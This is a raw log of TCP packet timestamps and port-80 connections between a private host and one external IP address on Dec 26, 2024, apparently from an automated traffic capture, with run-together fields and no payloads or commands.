                                                                                                                              Dec 26, 2024 17:17:18.080580950 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:18.080641031 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:18.080682993 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:18.172214031 CET8049741104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:18.172401905 CET8049741104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:18.784296036 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:18.874296904 CET8049741104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:18.974240065 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.038444996 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.099021912 CET4974180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.126353025 CET8049741104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.208378077 CET4974180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.270883083 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.285165071 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.372037888 CET4974180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.374177933 CET4974580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.404721975 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.492584944 CET8049741104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.492714882 CET4974180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.494355917 CET8049745104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.494478941 CET4974580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.501445055 CET4974580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.617876053 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.620965004 CET8049745104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.626833916 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.747658968 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.747677088 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.747709036 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.747725010 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.747776031 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.747850895 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.747889042 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.748013973 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.748019934 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.748045921 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.748074055 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.748112917 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.748176098 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.748187065 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.748241901 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.748250961 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.748265028 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.748481035 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.867444992 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.867489100 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.867589951 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.867664099 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.867795944 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.867876053 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.867994070 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.868036032 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.868063927 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.868089914 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.868235111 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.868266106 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.868299961 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.868321896 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.868412971 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.868426085 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.868499041 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.962798119 CET4974580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.987222910 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.987323046 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.987448931 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.987652063 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.987723112 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.987790108 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.987838984 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.987919092 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.987967014 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:19.988060951 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988095045 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988106966 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988158941 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988238096 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988456011 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988467932 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988517046 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988528967 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988573074 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988600969 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988615990 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988629103 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988744974 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988759041 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988774061 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988858938 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988872051 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988903999 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.988977909 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.989000082 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.989012957 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.989053965 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.989068031 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.989084959 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.989159107 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.989223003 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.989234924 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.989247084 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.989325047 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.989404917 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.989418030 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:19.989429951 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:20.083712101 CET8049745104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:20.083740950 CET8049745104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:20.083765030 CET8049745104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:20.107507944 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:20.107522011 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:20.107600927 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:20.107614994 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:20.107660055 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:20.107701063 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:20.107796907 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:20.107820034 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:20.107903004 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:20.107916117 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:20.107929945 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:20.107952118 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:20.108040094 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:20.108062983 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:20.674300909 CET8049745104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:20.869399071 CET4974580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:20.930618048 CET8049745104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:21.005250931 CET4974580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:21.058617115 CET4974580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:21.059855938 CET4974880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:21.096920967 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:21.104305029 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:21.179470062 CET8049745104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:21.179522991 CET4974580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:21.180031061 CET8049748104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:21.180136919 CET4974880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:21.180239916 CET4974880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:21.223967075 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:21.302418947 CET8049748104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:21.436883926 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:21.439676046 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:21.537386894 CET4974880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:21.559401035 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:21.559433937 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:21.656975031 CET8049748104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:21.657004118 CET8049748104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:21.657084942 CET8049748104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:21.966892958 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:22.161504030 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:22.360797882 CET8049748104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:22.411500931 CET4974880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:22.625031948 CET8049748104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:22.708400965 CET4974880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:23.191121101 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:23.194875956 CET4974880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:23.220407009 CET4975080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:23.285518885 CET4975180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:23.311078072 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:23.311163902 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:23.314721107 CET8049748104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:23.314795971 CET4974880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:23.340027094 CET8049750104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:23.340104103 CET4975080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:23.340255022 CET4975080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:23.405249119 CET8049751104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:23.405313969 CET4975180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:23.405401945 CET4975180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:23.459672928 CET8049750104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:23.524914980 CET8049751104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:23.693658113 CET4975080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:23.764278889 CET4975180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:23.813425064 CET8049750104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:23.813440084 CET8049750104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:23.883976936 CET8049751104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:23.883991003 CET8049751104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:23.884004116 CET8049751104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:24.518815041 CET8049750104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:24.593673944 CET8049751104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:24.661498070 CET4975080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:24.708374977 CET4975180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:24.775172949 CET8049750104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:24.857208967 CET8049751104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:24.911499023 CET4975180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:24.973198891 CET4975080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:24.973414898 CET4975180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:24.975009918 CET4975280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:25.093178034 CET8049750104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:25.093235016 CET4975080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:25.093748093 CET8049751104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:25.093815088 CET4975180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:25.094698906 CET8049752104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:25.094877958 CET4975280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:25.095046043 CET4975280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:25.214656115 CET8049752104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:25.443231106 CET4975280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:25.562953949 CET8049752104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:25.562999010 CET8049752104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:25.563040972 CET8049752104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:25.811477900 CET4975380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:25.932774067 CET8049753104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:25.932866096 CET4975380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:26.078680992 CET4975380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:26.198406935 CET8049753104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:26.273561954 CET8049752104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:26.427242994 CET4975380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:26.474025011 CET4975280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:26.530343056 CET8049752104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:26.547190905 CET8049753104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:26.547204018 CET8049753104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:26.665170908 CET4975280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:26.665973902 CET4975480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:26.785216093 CET8049752104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:26.785274029 CET4975280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:26.785629988 CET8049754104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:26.785696983 CET4975480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:26.785809040 CET4975480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:26.905265093 CET8049754104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:27.111509085 CET8049753104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:27.132946968 CET4975480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:27.208415985 CET4975380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:27.253267050 CET8049754104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:27.253782034 CET8049754104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:27.253801107 CET8049754104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:27.362562895 CET8049753104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:27.411510944 CET4975380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:27.963182926 CET8049754104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:28.005275965 CET4975480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:28.651643991 CET8049754104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:28.652121067 CET8049754104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:28.652245998 CET4975480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:28.689425945 CET4975380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:28.809536934 CET8049753104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:28.813533068 CET4975380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:28.896300077 CET4975480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:28.994937897 CET4975580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:29.016000032 CET8049754104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:29.116868019 CET8049755104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:29.116955996 CET4975580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:29.120820999 CET4975580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:29.228991032 CET8049754104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:29.230411053 CET4975480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:29.240390062 CET8049755104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:29.350491047 CET8049754104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:29.350611925 CET8049754104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:29.474538088 CET4975580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:29.594450951 CET8049755104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:29.594484091 CET8049755104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:29.594531059 CET8049755104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:29.758949995 CET8049754104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:29.802149057 CET4975480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:30.294440031 CET8049755104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:30.349015951 CET4975580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:30.546041965 CET8049755104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:30.599010944 CET4975580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:30.674765110 CET4975480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:30.675106049 CET4975580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:30.675883055 CET4975680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:30.772138119 CET4975780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:30.794816017 CET8049754104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:30.795089006 CET4975480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:30.795155048 CET8049755104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:30.795200109 CET4975580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:30.795367002 CET8049756104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:30.795442104 CET4975680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:30.795567989 CET4975680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:30.891792059 CET8049757104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:30.891870975 CET4975780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:30.891957045 CET4975780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:30.915019989 CET8049756104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:31.011512995 CET8049757104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:31.174789906 CET4975680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:31.295108080 CET8049756104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:31.295129061 CET8049756104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:31.295141935 CET8049756104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:31.515649080 CET4975780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:31.637450933 CET8049757104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:31.637768984 CET8049757104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:31.972302914 CET8049756104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:32.020896912 CET4975680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.069612026 CET8049757104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:32.114834070 CET4975780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.238660097 CET8049756104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:32.286511898 CET4975680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.322053909 CET8049757104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:32.360115051 CET4975680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.360161066 CET4975780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.360836983 CET4975880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.480097055 CET8049756104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:32.480154991 CET4975680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.480492115 CET8049758104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:32.480552912 CET4975880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.480612993 CET8049757104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:32.480707884 CET4975780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.480792046 CET4975880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.606611967 CET8049758104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:32.833529949 CET4975880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:32.953466892 CET8049758104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:32.953514099 CET8049758104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:32.953547955 CET8049758104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:33.334677935 CET4975980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:33.335572958 CET4975880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:33.454880953 CET8049759104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:33.454984903 CET4975980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:33.455077887 CET4975980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:33.455463886 CET4976080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:33.455809116 CET8049758104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:33.455874920 CET4975880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:33.574877024 CET8049759104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:33.575205088 CET8049760104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:33.575280905 CET4976080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:33.575426102 CET4976080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:33.694997072 CET8049760104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:33.802400112 CET4975980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:33.922521114 CET8049759104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:33.922540903 CET8049759104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:33.927407026 CET4976080192.168.2.4104.21.93.162
